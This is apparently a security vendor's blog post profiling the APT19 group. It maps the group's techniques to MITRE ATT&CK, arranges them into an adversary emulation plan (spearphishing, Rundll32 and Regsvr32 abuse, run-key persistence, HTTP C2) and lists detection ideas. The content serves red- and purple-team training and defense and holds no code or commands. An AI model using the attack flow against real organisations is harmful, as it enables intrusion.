#ThreatThursday - APT19

Introducing #ThreatThursday

Adversarial Emulation is a threat intelligence driven process. Leveraging threat intelligence is required for more effective defense (Blue Team) and offense (Red Team). We must understand how threats operate and their behaviors (tactics, techniques, and procedures) to stay ahead of them and prevent or detect when they attack our organization. For these reasons, we want to share our vision for being threat-led with our readers and introduce #ThreatThursday.

For #ThreatThursday posts we plan to:

  • Introduce a threat
  • Extract adversary TTPs from Cyber Threat Intelligence
  • Emulate those TTPs
  • Cover techniques to defend against those TTPs 

At a high level, we will consume Cyber Threat Intelligence and map it to MITRE ATT&CK. We may use other MITRE tools like ATT&CK Navigator for visualization and creating a threat profile. Based on the TTPs of the threat actor, we will create an adversary emulation plan and technically demonstrate the adversary in action with our enterprise-grade C2 framework, SCYTHE. Finally, we will show how Blue Teams  can prevent or detect that adversary from successfully breaching your organization.

APT19

For this first #ThreatThursday we will start with APT19. APT19 is not a very sophisticated threat actor with only 20 known TTPs using mostly Empire and Cobalt Strike. This makes it an ideal candidate for organizations beginning a threat-led defense. 

Cyber Threat Intelligence

Our first step is to acquire threat intelligence about APT19. The MITRE ATT&CK site is a great starting point. Click on Groups on the top menu bar and select APT19. Here we learn some basic information about APT19 such as its objectives, associated group names, techniques and software used, and references to Cyber Threat Intelligence for further reading.

APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. Some analysts track APT19 and Deep Panda as the same group, but it is unclear from open source information if the groups are the same.

The various techniques are listed in the MITRE ATT&CK page but we can use ATT&CK Navigator to create a graphical representation of this threat actor.

Visit the ATT&CK Navigator site hosted on Github, one can also build this site internally for tracking and adding notes to TTPs. On the top right “selection controls” bar click the third icon from left to right “multi-select”. Then click select next to APT19. You will notice some rectangles in the ATT&CK framework now have borders. Click the “multi-select” button again to get out of that menu. Then on the top right “technique controls” select the second icon from left to right “background color” and click the red color. You will notice the techniques attributed to APT19 are now red as can be seen below in Figure 1.

 

 

This offers a quick method of obtaining Cyber Threat Intelligence from a threat actor and mapping it to MITRE ATT&CK for creating an Adversary Emulation plan.

Adversary Emulation Plan

Now it is time to arrange APT19 TTPs into an attack flow that can be emulated. The simplest method is with a table that covers the tactic, techniques, and some notes. Start with the Description of the group and their Objective. The objective is the end goal of the adversary emulation. In the case of APT19, it is to gain persistence on an internal network. 

The next step is to map out the tactics and techniques that will be emulated. From a Red Team perspective, we generally set up Command and Control first, then Initial Access, and then the other Tactics as can be seen in Table 1.

Tactic

Description

Description

APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services.

Objective

Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks.

Command and Control

Commonly Used Port (T1043) - TCP port 80; Standard Application Layer Protocol (T1071) - HTTP; Deobfuscate/Decode Files or Information (T1140); Data Encoding (T1132) - used Base64 to encode communications to the C2 server

Initial Access

Spearphishing attachment (T1193); Spearphishing link (T1192)

Execution

Rundll32 (T1085); User Execution (T1204); Hidden Windows (T1143); PowerShell (T1086); Obfuscated Files or Information (T1027); DLL Side-Loading (T1073)

Discover

System Owner/User Discovery (T1033); System Information Discovery (T1082) System Network Configuration Discovery (T1016)

Persistence

Registry Run Keys/Startup Folder (T1060)

Defense Evasion

Regsvr32 (T1117); Scripting (T1064) - downloaded and launched code within a SCT file to bypass application whitelisting techniques

Table 1

Emulating APT19

With an adversary emulation plan, it is now time to set up our command and control framework and emulate the various TTPs that have been selected.

 

This threat can be imported into SCYTHE by downloading the JSON from our Github community threats repository. Import it into SCYTHE and run your own campaign. To import a JSON go to Threat Manager - Migrate Threats - Choose File - Import.

Jorge Orchilles did a much longer presentation on the Adversary Emulation process, emulating APT19 with Empire and SCYTHE, and tracking the exercise with VECTR for the Brazilian community GoHacking. It is available here: https://www.youtube.com/watch?v=YMTlrjkbZHM

Defending APT19

APT19 is a lower sophistication actor that leverages Cobalt Strike and Empire. Most organizations should have built in anti-malware detection against these types of vanilla payloads. The focus should be more on detecting the behaviors particularly the use of LOLBAS which are Microsoft signed binaries that are used for malicious activity. Here are some ideas:

  • Monitor outbound HTTP connections, particularly beacons that match patterns. Here is a great article from our friends at Black Hills Information security: https://www.blackhillsinfosec.com/detecting-malware-beacons-with-zeek-and-rita/
  • Enable logging on PowerShell and monitor it for malicious activity
  • Review use of Rundll32.exe to load arbitrary DLLs
  • Inspect startup folders and registry run keys for persistence mechanisms
  • Review use of Regsvr32.exe for loading arbitrary scripted files

Conclusion

This was our first #ThreatThursday covering the overall flow of the information we want to share with our readers to push the industry forward into threat-led defense. We have consumed threat intelligence for APT19, extracted the TTPs, created an adversary emulation plan, performed the adversary emulation with SCYTHE, saved the threat and shared so you can run it as well, and provided techniques to detect APT19. We hope you enjoyed and found this valuable. Let us know what you think and what threats you’d like to see in the future. And, contact us if you’re interested in building or taking your threat-led defense to the next level. We provide Purple Team consulting to help build the capability or run exercises and of course, our platform SCYTHE, gives you the power to run them on your own.

This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.

About SCYTHE

SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors. For more information email info@scythe.io, visit https://scythe.io, or follow on Twitter @scythe_io.